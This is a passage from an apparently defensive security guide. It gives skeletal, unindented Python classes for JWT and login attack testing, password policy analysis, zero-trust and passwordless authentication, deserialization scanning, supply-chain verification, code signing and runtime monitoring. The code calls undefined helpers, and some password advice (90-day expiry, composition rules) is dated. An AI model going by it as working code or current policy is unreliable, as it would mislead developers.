invalid_user_response
):
tests.append({
'type': 'credential_enumeration',
'severity': 'Medium',
'description': 'Different responses for valid/invalid users',
'recommendation': 'Standardize error messages'
})
# Rate limiting effectiveness test
for i in range(100):
response = self.target.login(
username=f"test_user_{i}",
password="wrong_password"
)
if response.status_code != 429 and i > 10:
tests.append({
'type': 'rate_limit_bypass',
'severity': 'High',
'description': 'No rate limiting on login attempts',
'recommendation': 'Implement rate limiting'
})
break
return tests
def test_jwt_attacks(self):
"""
Test JWT implementation vulnerabilities
"""
tests = []
# Get a valid JWT
valid_jwt = self.get_valid_jwt()
# Test 1: Algorithm confusion
confused_jwt = self.create_algorithm_confusion_jwt(valid_jwt)
if self.target.accepts_jwt(confused_jwt):
tests.append({
'type': 'jwt_algorithm_confusion',
'severity': 'Critical',
'description': 'JWT algorithm confusion vulnerability',
'recommendation': 'Explicitly verify algorithm'
})
# Test 2: Signature stripping
stripped_jwt = self.strip_signature(valid_jwt)
if self.target.accepts_jwt(stripped_jwt):
tests.append({
'type': 'jwt_signature_stripping',
'severity': 'Critical',
'description': 'JWT accepted without signature',
'recommendation': 'Require signature validation'
})
# Test 3: Claim tampering
tampered_jwt = self.tamper_claims(valid_jwt, {'role': 'admin'})
if self.target.accepts_jwt(tampered_jwt):
tests.append({
'type': 'jwt_claim_tampering',
'severity': 'High',
'description': 'JWT claims can be tampered',
'recommendation': 'Validate claim signatures'
})
# Test 4: Expired token acceptance
expired_jwt = self.create_expired_jwt()
if self.target.accepts_jwt(expired_jwt):
tests.append({
'type': 'jwt_expiry_bypass',
'severity': 'High',
'description': 'Expired JWT tokens accepted',
'recommendation': 'Validate token expiration'
})
return tests
Password Security Analysis Framework
class PasswordSecurityAnalyzer:
def __init__(self):
self.breached_passwords = self.load_breach_database()
self.common_passwords = self.load_common_passwords()
self.password_rules = self.load_password_rules()
def analyze_password_policy(self, policy):
"""
Analyze password policy effectiveness
"""
analysis = {
'strength': 0,
'vulnerabilities': [],
'recommendations': []
}
# Check minimum length
if policy.min_length < 12:
analysis['vulnerabilities'].append({
'type': 'short_minimum_length',
'severity': 'High',
'description': f'Minimum length {policy.min_length} is too short',
'recommendation': 'Increase minimum length to 12 characters'
})
# Check character requirements
if not policy.require_uppercase:
analysis['vulnerabilities'].append({
'type': 'missing_uppercase_requirement',
'severity': 'Medium',
'description': 'No uppercase character requirement',
'recommendation': 'Require at least one uppercase letter'
})
if not policy.require_lowercase:
analysis['vulnerabilities'].append({
'type': 'missing_lowercase_requirement',
'severity': 'Medium',
'description': 'No lowercase character requirement',
'recommendation': 'Require at least one lowercase letter'
})
if not policy.require_numbers:
analysis['vulnerabilities'].append({
'type': 'missing_number_requirement',
'severity': 'Medium',
'description': 'No number requirement',
'recommendation': 'Require at least one number'
})
if not policy.require_special:
analysis['vulnerabilities'].append({
'type': 'missing_special_requirement',
'severity': 'Medium',
'description': 'No special character requirement',
'recommendation': 'Require at least one special character'
})
# Check maximum age
if not policy.max_age_days or policy.max_age_days > 90:
analysis['vulnerabilities'].append({
'type': 'long_password_age',
'severity': 'Medium',
'description': f'Password age {policy.max_age_days} days is too long',
'recommendation': 'Set maximum password age to 90 days'
})
# Check password history
if not policy.history_size or policy.history_size < 5:
analysis['vulnerabilities'].append({
'type': 'insufficient_password_history',
'severity': 'Medium',
'description': f'Password history size {policy.history_size} is insufficient',
'recommendation': 'Maintain at least 5 previous passwords'
})
# Check for common password prevention
if not policy.prevent_common_passwords:
analysis['vulnerabilities'].append({
'type': 'common_passwords_allowed',
'severity': 'High',
'description': 'Common passwords are not prevented',
'recommendation': 'Implement common password checking'
})
# Calculate overall strength score
analysis['strength'] = self.calculate_policy_strength(policy)
return analysis
def test_password_strength(self, passwords):
"""
Test actual password strength
"""
results = []
for password in passwords:
# Skip empty passwords
if not password:
continue
strength = self.calculate_password_strength(password)
entropy = self.calculate_entropy(password)
# Check against breach database
is_breached = password in self.breached_passwords
# Check against common passwords
is_common = password in self.common_passwords
# Check for patterns
patterns = self.detect_patterns(password)
results.append({
'password': '***' + password[-3:] if len(password) > 3 else '***',
'length': len(password),
'strength': strength,
'entropy': entropy,
'is_breached': is_breached,
'is_common': is_common,
'patterns': patterns,
'recommendations': self.generate_recommendations(
password, strength, is_breached, is_common, patterns
)
})
return results
def calculate_password_strength(self, password):
"""
Calculate comprehensive password strength
"""
score = 0
# Length score
if len(password) >= 8:
score += 1
if len(password) >= 12:
score += 2
if len(password) >= 16:
score += 3
if len(password) >= 20:
score += 4
# Character variety score
char_categories = 0
if re.search(r'[A-Z]', password):
char_categories += 1
if re.search(r'[a-z]', password):
char_categories += 1
if re.search(r'\d', password):
char_categories += 1
if re.search(r'[^A-Za-z0-9]', password):
char_categories += 1
score += char_categories
# Entropy bonus
entropy = self.calculate_entropy(password)
if entropy > 80:
score += 3
elif entropy > 60:
score += 2
elif entropy > 40:
score += 1
# Pattern penalty
patterns = self.detect_patterns(password)
score -= len(patterns) * 2
# Common password penalty
if password in self.common_passwords:
score -= 10
# Breached password penalty
if password in self.breached_passwords:
score -= 20
# Normalize to 0-100 scale
normalized_score = max(0, min(100, (score / 15) * 100))
return normalized_score
Zero-Trust Authentication System
class ZeroTrustAuthentication:
def __init__(self):
self.context_collector = ContextCollector()
self.risk_engine = RiskEngine()
self.policy_engine = PolicyEngine()
self.adaptive_auth = AdaptiveAuthenticator()
def authenticate(self, request):
"""
Zero-trust authentication with continuous evaluation
"""
# Step 1: Collect context
context = self.context_collector.collect(request)
# Step 2: Initial authentication
auth_result = self.initial_authentication(request)
if not auth_result.success:
return AuthenticationResponse(
success=False,
reason=auth_result.reason
)
# Step 3: Calculate risk score
risk_score = self.risk_engine.calculate(
auth_result,
context
)
# Step 4: Apply policies
policy_result = self.policy_engine.evaluate(
auth_result.user,
context,
risk_score
)
# Step 5: Adaptive authentication
if risk_score > policy_result.threshold:
# Step-up authentication required
step_up_result = self.adaptive_auth.step_up(
auth_result.user,
context,
risk_score
)
if not step_up_result.success:
return AuthenticationResponse(
success=False,
reason='Step-up authentication failed'
)
# Step 6: Generate continuous authentication token
cat = self.generate_continuous_auth_token(
auth_result.user,
context,
risk_score
)
# Step 7: Return authentication result with CAT
return AuthenticationResponse(
success=True,
user=auth_result.user,
session_token=self.generate_session_token(),
continuous_auth_token=cat,
risk_score=risk_score,
policies_applied=policy_result.applied_policies
)
def continuous_evaluation(self, session_token, request):
"""
Continuously evaluate authentication context
"""
# Step 1: Validate session
session = self.validate_session(session_token)
if not session.valid:
return EvaluationResult(invalid_session=True)
# Step 2: Collect current context
context = self.context_collector.collect(request)
# Step 3: Check for anomalies
anomalies = self.detect_anomalies(session, context)
if anomalies:
# Step 4: Recalculate risk
risk_score = self.risk_engine.recalculate(
session,
context,
anomalies
)
# Step 5: Apply adaptive controls
if risk_score > session.risk_threshold:
# Trigger step-up or session termination
return self.handle_risk_escalation(
session,
context,
risk_score,
anomalies
)
return EvaluationResult(
valid=True,
risk_score=session.risk_score,
anomalies=anomalies
)
def detect_anomalies(self, session, context):
"""
Detect authentication anomalies
"""
anomalies = []
# Geographic anomalies
if session.location and context.location:
distance = self.calculate_distance(
session.location,
context.location
)
# Check if physically possible
time_diff = context.timestamp - session.last_activity
max_speed = 1000 # km/h (accounting for air travel)
max_distance = (time_diff.total_seconds() / 3600) * max_speed
if distance > max_distance:
anomalies.append({
'type': 'geographic_impossibility',
'distance_km': distance,
'max_possible_km': max_distance
})
# Device fingerprint anomalies
if session.device_fingerprint != context.device_fingerprint:
similarity = self.calculate_fingerprint_similarity(
session.device_fingerprint,
context.device_fingerprint
)
if similarity < 0.8: # 80% similarity threshold
anomalies.append({
'type': 'device_fingerprint_change',
'similarity': similarity
})
# Behavioral anomalies
behavior_profile = session.behavior_profile
current_behavior = self.extract_behavior(context)
behavior_deviation = self.calculate_behavior_deviation(
behavior_profile,
current_behavior
)
if behavior_deviation > 2.0: # 2 standard deviations
anomalies.append({
'type': 'behavioral_anomaly',
'deviation': behavior_deviation
})
# Time-based anomalies
if session.typical_hours:
current_hour = context.timestamp.hour
if current_hour not in session.typical_hours:
anomalies.append({
'type': 'unusual_access_time',
'current_hour': current_hour,
'typical_hours': session.typical_hours
})
# Network anomalies
if session.typical_networks:
current_network = context.network
if current_network not in session.typical_networks:
anomalies.append({
'type': 'unusual_network',
'current_network': current_network,
'typical_networks': session.typical_networks
})
return anomalies
Passwordless Authentication Implementation
class PasswordlessAuthentication:
def __init__(self):
self.webauthn = WebAuthnHandler()
self.magic_links = MagicLinkHandler()
self.push_notifications = PushNotificationHandler()
self.security_keys = SecurityKeyManager()
def initiate_passwordless_auth(self, user_identifier):
"""
Initiate passwordless authentication
"""
# Step 1: Identify user
user = self.lookup_user(user_identifier)
if not user:
return AuthResponse(
success=False,
error='User not found'
)
# Step 2: Determine available methods
available_methods = self.get_available_methods(user)
# Step 3: Select method based on risk and user preference
method = self.select_auth_method(
user,
available_methods,
self.calculate_request_risk()
)
# Step 4: Initiate authentication
if method == 'webauthn':
return self.initiate_webauthn(user)
elif method == 'magic_link':
return self.initiate_magic_link(user)
elif method == 'push':
return self.initiate_push_notification(user)
elif method == 'security_key':
return self.initiate_security_key(user)
else:
return AuthResponse(
success=False,
error='No suitable authentication method'
)
def initiate_webauthn(self, user):
"""
Initiate WebAuthn authentication
"""
# Generate challenge
challenge = self.generate_challenge()
# Get user's credentials
credentials = self.get_user_credentials(user.id)
# Create options for authentication
options = {
'challenge': challenge,
'timeout': 60000,
'rpId': self.get_rp_id(),
'allowCredentials': [
{
'type': 'public-key',
'id': cred.id,
'transports': cred.transports
}
for cred in credentials
],
'userVerification': 'required'
}
# Store challenge for verification
self.store_challenge(user.id, challenge)
return AuthResponse(
success=True,
method='webauthn',
options=options
)
def verify_webauthn(self, user_id, assertion_response):
"""
Verify WebAuthn assertion
"""
# Retrieve stored challenge
stored_challenge = self.retrieve_challenge(user_id)
if not stored_challenge:
return VerificationResult(
success=False,
error='No pending challenge'
)
# Get user's credential
credential = self.get_credential(
user_id,
assertion_response.id
)
if not credential:
return VerificationResult(
success=False,
error='Unknown credential'
)
# Verify assertion
verification_result = self.webauthn.verify_assertion(
assertion_response,
credential.public_key,
stored_challenge,
self.get_rp_id()
)
if verification_result.success:
# Update credential usage
self.update_credential_usage(credential.id)
# Create session
session_token = self.create_session(user_id)
return VerificationResult(
success=True,
session_token=session_token,
user_id=user_id
)
else:
return VerificationResult(
success=False,
error=verification_result.error
)
def initiate_magic_link(self, user):
"""
Initiate magic link authentication
"""
# Generate unique token
token = self.generate_secure_token()
# Create secure link
link = self.create_magic_link(token)
# Store token with metadata
self.store_magic_token(
token=token,
user_id=user.id,
expires_at=datetime.now() + timedelta(minutes=10),
max_uses=1
)
# Send to user's verified email
self.send_magic_link_email(user.email, link)
return AuthResponse(
success=True,
method='magic_link',
message='Check your email for the magic link'
)
def verify_magic_link(self, token):
"""
Verify magic link token
"""
# Retrieve token metadata
token_data = self.retrieve_magic_token(token)
if not token_data:
return VerificationResult(
success=False,
error='Invalid token'
)
# Check expiration
if token_data.expires_at < datetime.now():
return VerificationResult(
success=False,
error='Token expired'
)
# Check usage limit
if token_data.uses >= token_data.max_uses:
return VerificationResult(
success=False,
error='Token already used'
)
# Increment usage
self.increment_token_usage(token)
# Create session
session_token = self.create_session(token_data.user_id)
return VerificationResult(
success=True,
session_token=session_token,
user_id=token_data.user_id
)
Insecure Deserialization Exploitation Matrix
| Language | Serialization Format | Attack Vector | Impact |
|---|---|---|---|
| Java | Java Serialization | Gadget chains via `ObjectInputStream` | RCE, DoS |
| .NET | BinaryFormatter | Type confusion, view state manipulation | RCE, auth bypass |
| Python | pickle | Arbitrary object construction | RCE, file access |
| PHP | `unserialize()` | Object injection, property manipulation | RCE, SQLi |
| Ruby | Marshal | Constant caching, symbol DoS | RCE, memory corruption |
| Node.js | `JSON.parse()` | Prototype pollution | Property injection |
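For the Python row above, the first choice is to avoid pickle for untrusted input altogether and prefer a data-only format such as JSON; where pickle cannot be removed, a restricted unpickler that whitelists constructible classes (the pattern suggested in the Python documentation) narrows the attack surface. A minimal sketch:
import io
import pickle

# Only these (module, class) pairs may be constructed during unpickling
ALLOWED_CLASSES = {("builtins", "dict"), ("builtins", "list"),
                   ("builtins", "str"), ("builtins", "int")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_CLASSES:
            raise pickle.UnpicklingError(f"Forbidden class: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() on semi-trusted data."""
    return RestrictedUnpickler(io.BytesIO(data)).load()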
Software Supply Chain Integrity Attacks
- Build System Compromise
  - Malicious build scripts
  - Compromised CI/CD pipelines
  - Toxic commits with hidden payloads
- Dependency Repository Attacks (a digest-pinning sketch follows this list)
  - Typosquatting packages
  - Account takeover of maintainers
  - Malicious updates to legitimate packages
- Artifact Repository Attacks
  - Malicious binaries replacing legitimate ones
  - Signature forgery
  - Metadata tampering
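A baseline control against the dependency and artifact repository attacks above is to pin each artifact to an expected digest and verify it before installation, so a tampered or typosquatted package fails closed. A minimal sketch; the pinned entries are hypothetical stand-ins for a real lockfile:
import hashlib
import hmac

# Hypothetical lockfile-style pins: artifact name -> expected SHA-256 hex digest
PINNED_DIGESTS = {
    "example-lib-1.2.3.tar.gz": "0f3a...",  # placeholder digest
}

def verify_artifact(path: str, artifact_name: str) -> bool:
    expected = PINNED_DIGESTS.get(artifact_name)
    if expected is None:
        return False  # unknown artifacts fail closed
    with open(path, "rb") as f:
        actual = hashlib.sha256(f.read()).hexdigest()
    return hmac.compare_digest(actual, expected)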
Deserialization Vulnerability Scanner
class DeserializationScanner:
def __init__(self):
self.gadget_chains = self.load_gadget_chains()
self.signature_database = self.load_signatures()
self.behavior_monitor = BehaviorMonitor()
def scan_application(self, app):
"""
Comprehensive deserialization vulnerability scan
"""
findings = []
# Phase 1: Static Analysis
static_findings = self.static_analysis(app.source_code)
findings.extend(static_findings)
# Phase 2: Dynamic Analysis
dynamic_findings = self.dynamic_analysis(app.runtime)
findings.extend(dynamic_findings)
# Phase 3: Behavioral Analysis
behavioral_findings = self.behavioral_analysis(app)
findings.extend(behavioral_findings)
# Phase 4: Exploit Verification
exploit_findings = self.exploit_verification(app, findings)
findings.extend(exploit_findings)
return self.prioritize_findings(findings)
def static_analysis(self, source_code):
"""
Static analysis for deserialization vulnerabilities
"""
findings = []
# Pattern matching for dangerous APIs
dangerous_patterns = {
'java': [
(r'ObjectInputStream', 'Java deserialization'),
(r'readObject\(', 'readObject method'),
(r'readResolve\(', 'readResolve method'),
(r'readExternal\(', 'readExternal method'),
(r'XMLDecoder', 'XML deserialization'),
(r'XStream', 'XStream deserialization'),
(r'JacksonObjectMapper', 'Jackson polymorphic deserialization'),
(r'@JsonTypeInfo', 'Jackson type information annotation')
],
'python': [
(r'pickle\.loads', 'Pickle deserialization'),
(r'pickle\.load', 'Pickle deserialization'),
(r'yaml\.load', 'YAML deserialization'),
(r'marshal\.loads', 'Marshal deserialization'),
(r'shelve', 'Shelve deserialization')
],
'php': [
(r'unserialize\(', 'PHP unserialize'),
(r'__wakeup\(', 'PHP wakeup magic method'),
(r'__destruct\(', 'PHP destruct magic method')
],
'net': [
(r'BinaryFormatter', '.NET BinaryFormatter'),
(r'Deserialize\(', '.NET deserialization'),
(r'JavaScriptSerializer', '.NET JavaScriptSerializer'),
(r'LosFormatter', '.NET LosFormatter')
]
}
for language, patterns in dangerous_patterns.items():
if language in source_code.language:
for pattern, description in patterns:
matches = re.finditer(pattern, source_code.content)
for match in matches:
# Get context
context = self.extract_context(
source_code.content,
match.start(),
100
)
findings.append({
'type': 'deserialization_api',
'language': language,
'api': match.group(),
'description': description,
'context': context,
'severity': 'High',
'location': {
'file': source_code.filepath,
'line': self.get_line_number(
source_code.content,
match.start()
)
}
})
# Class analysis for Java
if source_code.language == 'java':
class_findings = self.analyze_java_classes(source_code)
findings.extend(class_findings)
return findings
def analyze_java_classes(self, source_code):
"""
Analyze Java classes for serialization vulnerabilities
"""
findings = []
# Parse Java classes
classes = self.parse_java_classes(source_code.content)
for class_info in classes:
# Check for Serializable interface
if class_info.implements_serializable:
# Check for serialVersionUID
if not class_info.has_serial_version_uid:
findings.append({
'type': 'missing_serialversionuid',
'class': class_info.name,
'description': 'Serializable class missing serialVersionUID',
'severity': 'Medium',
'recommendation': 'Add explicit serialVersionUID field'
})
# Check for sensitive fields
sensitive_fields = self.find_sensitive_fields(class_info)
if sensitive_fields:
findings.append({
'type': 'sensitive_data_serialization',
'class': class_info.name,
'fields': sensitive_fields,
'description': 'Sensitive fields in serializable class',
'severity': 'High',
'recommendation': 'Mark fields as transient or implement custom serialization'
})
# Check for custom serialization methods
if class_info.has_custom_serialization:
# Analyze custom readObject/writeObject methods
custom_findings = self.analyze_custom_serialization(
class_info
)
findings.extend(custom_findings)
# Check for gadget chains
gadget_chain = self.check_gadget_chain(class_info)
if gadget_chain:
findings.append({
'type': 'gadget_chain',
'class': class_info.name,
'chain': gadget_chain,
'description': 'Potential gadget chain for deserialization attack',
'severity': 'Critical',
'recommendation': 'Avoid deserialization of untrusted data'
})
return findings
def dynamic_analysis(self, runtime):
"""
Dynamic analysis for deserialization vulnerabilities
"""
findings = []
# Monitor deserialization operations
with self.behavior_monitor.monitor_process(runtime.pid):
# Send various payloads
payloads = self.generate_deserialization_payloads()
for payload in payloads:
response = self.send_payload(runtime, payload)
# Analyze response for anomalies
anomalies = self.analyze_response_anomalies(response)
if anomalies:
findings.append({
'type': 'deserialization_anomaly',
'payload': payload.type,
'anomalies': anomalies,
'severity': 'High',
'description': 'Anomalous behavior during deserialization'
})
return findings
Software Supply Chain Integrity Verification
class SupplyChainIntegrityVerifier:
def __init__(self):
self.sbom_manager = SBOMManager()
self.artifact_verifier = ArtifactVerifier()
self.provenance_validator = ProvenanceValidator()
self.reputation_checker = ReputationChecker()
def verify_integrity(self, artifact, policy):
"""
End-to-end supply chain integrity verification
"""
verification_report = {
'artifact': artifact.identifier,
'checks': {},
'overall_status': 'pending'
}
# Check 1: Artifact Signature
signature_check = self.artifact_verifier.verify_signature(artifact)
verification_report['checks']['signature'] = signature_check
# Check 2: Hash Integrity
hash_check = self.artifact_verifier.verify_hash(artifact)
verification_report['checks']['hash'] = hash_check
# Check 3: SBOM Verification
sbom_check = self.sbom_manager.verify(artifact)
verification_report['checks']['sbom'] = sbom_check
# Check 4: Provenance Verification
provenance_check = self.provenance_validator.validate(
artifact.provenance
)
verification_report['checks']['provenance'] = provenance_check
# Check 5: Build Environment Verification
build_env_check = self.verify_build_environment(
artifact.provenance.build_environment
)
verification_report['checks']['build_environment'] = build_env_check
# Check 6: Dependency Verification
dependency_check = self.verify_dependencies(artifact.sbom)
verification_report['checks']['dependencies'] = dependency_check
# Check 7: Reputation Check
reputation_check = self.reputation_checker.check(artifact)
verification_report['checks']['reputation'] = reputation_check
# Check 8: Vulnerability Scan
vulnerability_check = self.scan_vulnerabilities(artifact)
verification_report['checks']['vulnerabilities'] = vulnerability_check
# Check 9: License Compliance
license_check = self.check_license_compliance(artifact.sbom)
verification_report['checks']['licenses'] = license_check
# Check 10: Behavioral Analysis
behavioral_check = self.analyze_behavior(artifact)
verification_report['checks']['behavior'] = behavioral_check
# Determine overall status
verification_report['overall_status'] = self.determine_overall_status(
verification_report['checks'],
policy
)
return verification_report
def verify_build_environment(self, build_env):
"""
Verify build environment integrity
"""
checks = []
# Check build system isolation
if not build_env.isolated:
checks.append({
'check': 'isolation',
'status': 'failed',
'description': 'Build environment not isolated'
})
# Check build system hermeticity
if not build_env.hermetic:
checks.append({
'check': 'hermetic',
'status': 'failed',
'description': 'Build not hermetic (network access during build)'
})
# Check build system reproducibility
reproducibility_check = self.check_reproducibility(build_env)
checks.extend(reproducibility_check)
# Check build system security controls
security_controls = self.check_security_controls(build_env)
checks.extend(security_controls)
# Determine overall status
if any(check['status'] == 'failed' for check in checks):
return {
'status': 'failed',
'details': checks
}
elif any(check['status'] == 'warning' for check in checks):
return {
'status': 'warning',
'details': checks
}
else:
return {
'status': 'passed',
'details': checks
}
def verify_dependencies(self, sbom):
"""
Verify dependency integrity
"""
checks = []
for component in sbom.components:
# Check dependency signature
if not component.signature:
checks.append({
'component': component.name,
'version': component.version,
'check': 'signature',
'status': 'failed',
'description': 'Dependency not signed'
})
# Check dependency provenance
if not component.provenance:
checks.append({
'component': component.name,
'version': component.version,
'check': 'provenance',
'status': 'warning',
'description': 'No provenance information available'
})
# Check dependency SBOM
if not component.sbom:
checks.append({
'component': component.name,
'version': component.version,
'check': 'sbom',
'status': 'warning',
'description': 'No SBOM available for dependency'
})
# Check dependency reputation
reputation = self.reputation_checker.check_component(component)
if reputation.score < 50:
checks.append({
'component': component.name,
'version': component.version,
'check': 'reputation',
'status': 'warning',
'description': f'Low reputation score: {reputation.score}'
})
if any(check['status'] == 'failed' for check in checks):
return {
'status': 'failed',
'details': checks
}
elif any(check['status'] == 'warning' for check in checks):
return {
'status': 'warning',
'details': checks
}
else:
return {
'status': 'passed',
'details': checks
}
Code Signing and Verification System
class CodeSigningSystem:
def __init__(self):
self.key_manager = KeyManager()
self.signer = Signer()
self.verifier = Verifier()
self.timestamp_authority = TimestampAuthority()
self.revocation_checker = RevocationChecker()
def sign_artifact(self, artifact, signing_key_id):
"""
Sign artifact with comprehensive metadata
"""
# Step 1: Calculate artifact hash
artifact_hash = self.calculate_hash(artifact.content)
# Step 2: Generate signing metadata
metadata = {
'artifact_hash': artifact_hash,
'signing_time': datetime.now().isoformat(),
'signer': self.get_signer_identity(signing_key_id),
'artifact_info': {
'name': artifact.name,
'version': artifact.version,
'type': artifact.type,
'size': len(artifact.content)
},
'environment': {
'os': platform.system(),
'architecture': platform.machine(),
'signing_tool': 'CodeSigningSystem v1.0'
}
}
# Step 3: Create signature
signature = self.signer.sign(
metadata,
signing_key_id
)
# Step 4: Get timestamp from trusted authority
timestamp_token = self.timestamp_authority.get_timestamp(
signature
)
# Step 5: Create signed artifact
signed_artifact = SignedArtifact(
content=artifact.content,
metadata=metadata,
signature=signature,
timestamp=timestamp_token,
certificate_chain=self.key_manager.get_certificate_chain(
signing_key_id
)
)
# Step 6: Generate verification information
signed_artifact.verification_info = self.generate_verification_info(
signed_artifact
)
return signed_artifact
def verify_artifact(self, signed_artifact):
"""
Comprehensive artifact verification
"""
verification_report = {
'artifact': signed_artifact.metadata['artifact_info']['name'],
'checks': {},
'overall_status': 'pending'
}
# Check 1: Signature validity
signature_check = self.verifier.verify_signature(
signed_artifact.signature,
signed_artifact.metadata,
signed_artifact.certificate_chain
)
verification_report['checks']['signature'] = signature_check
# Check 2: Certificate chain validation
cert_chain_check = self.verifier.verify_certificate_chain(
signed_artifact.certificate_chain
)
verification_report['checks']['certificate_chain'] = cert_chain_check
# Check 3: Timestamp verification
timestamp_check = self.verifier.verify_timestamp(
signed_artifact.timestamp,
signed_artifact.signature
)
verification_report['checks']['timestamp'] = timestamp_check
# Check 4: Revocation status
revocation_check = self.revocation_checker.check(
signed_artifact.certificate_chain
)
verification_report['checks']['revocation'] = revocation_check
# Check 5: Artifact hash verification
current_hash = self.calculate_hash(signed_artifact.content)
expected_hash = signed_artifact.metadata['artifact_hash']
hash_check = {
'status': 'passed' if current_hash == expected_hash else 'failed',
'current_hash': current_hash,
'expected_hash': expected_hash
}
verification_report['checks']['hash'] = hash_check
# Check 6: Signer authorization
signer_check = self.verify_signer_authorization(
signed_artifact.certificate_chain,
signed_artifact.metadata['artifact_info']
)
verification_report['checks']['signer_authorization'] = signer_check
# Check 7: Policy compliance
policy_check = self.check_policy_compliance(signed_artifact)
verification_report['checks']['policy'] = policy_check
# Determine overall status
verification_report['overall_status'] = self.determine_verification_status(
verification_report['checks']
)
return verification_report
def generate_verification_info(self, signed_artifact):
"""
Generate information for runtime verification
"""
# Create minimal verification data for runtime checks
verification_info = {
'signature_digest': self.calculate_hash(
signed_artifact.signature
),
'certificate_fingerprints': [
self.calculate_certificate_fingerprint(cert)
for cert in signed_artifact.certificate_chain
],
'verification_policy': {
'required_checks': [
'signature',
'hash',
'timestamp',
'revocation'
],
'allowed_signers': self.get_allowed_signers(),
'max_age_days': 365
}
}
# Add signature for verification_info itself
verification_info['self_signature'] = self.signer.sign(
verification_info,
self.key_manager.get_verification_key_id()
)
return verification_info
Runtime Integrity Monitoring
class RuntimeIntegrityMonitor:
def __init__(self):
self.baseline_store = BaselineStore()
self.behavior_monitor = BehaviorMonitor()
self.anomaly_detector = AnomalyDetector()
self.response_engine = ResponseEngine()
def monitor_application(self, app_process):
"""
Monitor application runtime integrity
"""
# Establish baseline
baseline = self.create_baseline(app_process)
# Start monitoring threads
monitors = [
Thread(target=self.monitor_memory, args=(app_process, baseline)),
Thread(target=self.monitor_filesystem, args=(app_process, baseline)),
Thread(target=self.monitor_process, args=(app_process, baseline)),
Thread(target=self.monitor_network, args=(app_process, baseline)),
Thread(target=self.monitor_libraries, args=(app_process, baseline))
]
for monitor in monitors:
monitor.daemon = True
monitor.start()
# Main monitoring loop
while app_process.is_running():
# Collect alerts from monitors
alerts = self.collect_alerts()
# Analyze alerts
incidents = self.analyze_alerts(alerts)
# Respond to incidents
for incident in incidents:
self.respond_to_incident(incident)
# Update baseline if needed
if self.should_update_baseline():
baseline = self.update_baseline(app_process, baseline)
time.sleep(1) # Monitoring interval
def monitor_memory(self, process, baseline):
"""
Monitor memory integrity
"""
while process.is_running():
# Get memory regions
memory_regions = self.get_memory_regions(process.pid)
# Check for unexpected memory regions
unexpected_regions = self.find_unexpected_memory_regions(
memory_regions,
baseline.memory_regions
)
if unexpected_regions:
# Analyze unexpected regions
for region in unexpected_regions:
# Check if it's executable
if region.is_executable:
# Extract and analyze code
code = self.read_memory(process.pid, region)
# Check for shellcode patterns
if self.detect_shellcode(code):
self.alert({
'type': 'memory_shellcode',
'process': process.pid,
'region': region,
'severity': 'Critical'
})
# Check for code injection
if self.detect_code_injection(code, baseline):
self.alert({
'type': 'code_injection',
'process': process.pid,
'region': region,
'severity': 'Critical'
})
# Check for memory corruption
corruption = self.detect_memory_corruption(process, baseline)
if corruption:
self.alert({
'type': 'memory_corruption',
'process': process.pid,
'corruption_type': corruption.type,
'severity': 'High'
})
time.sleep(0.5) # Memory monitoring interval
def monitor_filesystem(self, process, baseline):
"""
Monitor filesystem integrity
"""
# Watch for file changes
watcher = FileSystemWatcher()
# Monitor critical directories
critical_dirs = [
'/usr/bin',
'/usr/sbin',
'/bin',
'/sbin',
'/etc',
process.working_directory
]
for directory in critical_dirs:
watcher.watch(directory, recursive=True)
while process.is_running():
# Get file system events
events = watcher.get_events()
for event in events:
# Check if event is suspicious
if self.is_suspicious_filesystem_event(event, baseline):
# Analyze the event
analysis = self.analyze_filesystem_event(event)
if analysis.suspicious:
self.alert({
'type': 'suspicious_filesystem_activity',
'process': process.pid,
'event': event,
'analysis': analysis,
'severity': analysis.severity
})
# Check file integrity
critical_files = self.get_critical_files(process)
for file_path in critical_files:
# Calculate current hash
current_hash = self.calculate_file_hash(file_path)
# Get expected hash from baseline
expected_hash = baseline.file_hashes.get(file_path)
if expected_hash and current_hash != expected_hash:
self.alert({
'type': 'file_tampering',
'process': process.pid,
'file': file_path,
'current_hash': current_hash,
'expected_hash': expected_hash,
'severity': 'Critical'
})
time.sleep(1) # Filesystem monitoring interval
def respond_to_incident(self, incident):
"""
Respond to integrity incident
"""
# Determine response based on incident type and severity
response_plan = self.response_engine.get_response_plan(
incident.type,
incident.severity
)
# Execute response actions
for action in response_plan.actions:
if action.type == 'isolate':
self.isolate_process(incident.process)
elif action.type == 'terminate':
self.terminate_process(incident.process)
elif action.type == 'rollback':
self.rollback_changes(incident)
elif action.type == 'alert':
self.send_alert(incident)
elif action.type == 'collect_forensics':
self.collect_forensic_data(incident)
elif action.type == 'block':
self.block_network(incident)
# Log incident and response
self.log_incident(incident, response_plan)
Observability vs Monitoring vs Logging
- Logging: Discrete events with contextual data
- Metrics: Numerical measurements over time
- Traces: End-to-end request journey
- Profiling: Resource usage analysis (an illustrative example follows this list)
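One way to keep the distinction straight is to follow a single request: it emits a log event (a discrete record with context), increments a metric (a number aggregated over time), and contributes a span to a trace, all joined by a shared identifier. An illustrative sketch with hypothetical field names:
import json
import time
import uuid
from datetime import datetime, timezone

trace_id = uuid.uuid4().hex
start = time.monotonic()
# ... handle the request here ...
duration_ms = round((time.monotonic() - start) * 1000, 2)

log_event = {                                  # logging: one discrete event with context
    "timestamp": datetime.now(timezone.utc).isoformat(),
    "event_type": "order_created",
    "trace_id": trace_id,
    "user_id": "u-123",
}
metric_sample = ("orders_created_total", 1)    # metrics: a counter sampled over time
trace_span = {                                 # tracing: one hop of the request journey
    "trace_id": trace_id,
    "span_name": "POST /orders",
    "duration_ms": duration_ms,
}
print(json.dumps([log_event, metric_sample, trace_span]))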
Advanced Logging Anti-Patterns
- Log Injection: User-controlled data in logs without sanitization (see the sanitization sketch after this list)
- Log Forging: Attacker creates false log entries
- Log Truncation: Critical data lost due to size limits
- Time Skew: Inconsistent timestamps across systems
- Log Retention Failure: Critical logs overwritten or deleted
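Log injection and forging are usually closed by escaping control characters in user-controlled values before they reach a sink, combined with structured output so a crafted value cannot masquerade as a separate entry. A minimal sketch:
import json
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("auth")

def sanitize_for_log(value: str, max_len: int = 256) -> str:
    # Escape CR/LF so attacker-supplied input cannot forge extra log lines,
    # and replace other non-printable characters outright
    value = value.replace("\r", "\\r").replace("\n", "\\n")
    value = "".join(ch if ch.isprintable() else "?" for ch in value)
    return value[:max_len]

# Example: a forged "successful_login" line stays inside one JSON field
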